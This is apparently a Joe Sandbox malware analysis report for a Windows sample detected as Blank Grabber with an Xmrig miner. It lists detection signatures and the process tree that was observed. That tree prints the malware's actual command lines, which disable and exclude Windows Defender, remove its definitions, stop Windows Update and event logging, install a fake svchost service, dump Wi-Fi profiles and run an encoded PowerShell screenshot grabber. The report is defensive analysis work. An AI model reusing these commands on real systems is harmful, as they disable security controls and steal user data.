Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
47SXvEQ.exe

Overview

General Information

Sample name:47SXvEQ.exe
Analysis ID:1585573
MD5:ce5152d5376f6ad0c918fb893248dd08
SHA1:9d5c6c34c29396d141f4df77166e522d57aca6e3
SHA256:e3dbee51df9dd78d9b3d643f7d7f9c7cb84b88819647d436f1a595d7c1a51e87
Tags:exemalwaretrojanuser-Joker
Infos:

Detection

Blank Grabber, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Blank Grabber
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Drops PE files with benign system names
Encrypted powershell cmdline option found
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
PE file contains section with special chars
Potentially malicious time measurement code found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sample is not signed and drops a device driver
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspect Svchost Activity
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Uses powercfg.exe to modify the power settings
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates driver files
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 47SXvEQ.exe (PID: 6956 cmdline: "C:\Users\user\Desktop\47SXvEQ.exe" MD5: CE5152D5376F6AD0C918FB893248DD08)
    • instals.exe (PID: 3716 cmdline: "C:\Users\user\AppData\Local\Temp\instals.exe" MD5: C289921058A4B38BDBD1373A0CBB757D)
      • powershell.exe (PID: 1136 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7872 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 7940 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • sc.exe (PID: 7880 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7976 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 8024 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 8084 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 8172 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 3288 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 2944 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 2828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6768 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 180 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7324 cmdline: C:\Windows\system32\sc.exe delete "NPYIAYNC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 4504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 6164 cmdline: C:\Windows\system32\sc.exe create "NPYIAYNC" binpath= "C:\ProgramData\Microsoft\svchost.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • sc.exe (PID: 7592 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7604 cmdline: C:\Windows\system32\sc.exe start "NPYIAYNC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Built.exe (PID: 5432 cmdline: "C:\Users\user\AppData\Local\Temp\Built.exe" MD5: CF6FC2AEA60B6D65DCC9C16166C8161A)
      • Built.exe (PID: 1420 cmdline: "C:\Users\user\AppData\Local\Temp\Built.exe" MD5: CF6FC2AEA60B6D65DCC9C16166C8161A)
        • cmd.exe (PID: 6928 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3068 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 1068 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7092 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
          • MpCmdRun.exe (PID: 7204 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
        • cmd.exe (PID: 6164 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 7188 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7024 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 7176 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • cmd.exe (PID: 7508 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 7564 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • cmd.exe (PID: 7580 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Conhost.exe (PID: 1312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 7636 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • cmd.exe (PID: 7652 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 7708 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • cmd.exe (PID: 7744 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 7800 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • cmd.exe (PID: 8068 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • attrib.exe (PID: 8156 cmdline: attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • cmd.exe (PID: 7400 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 4320 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • cmd.exe (PID: 7184 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 2676 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • cmd.exe (PID: 7576 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 7936 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • cmd.exe (PID: 7588 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3808 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7580 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 2144 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • cmd.exe (PID: 928 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tree.com (PID: 7896 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
        • cmd.exe (PID: 7716 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • netsh.exe (PID: 7988 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • Conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 8068 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • systeminfo.exe (PID: 6228 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
        • cmd.exe (PID: 8188 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tree.com (PID: 3512 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
        • cmd.exe (PID: 6208 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 6948 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • cmd.exe (PID: 2536 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2944 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBj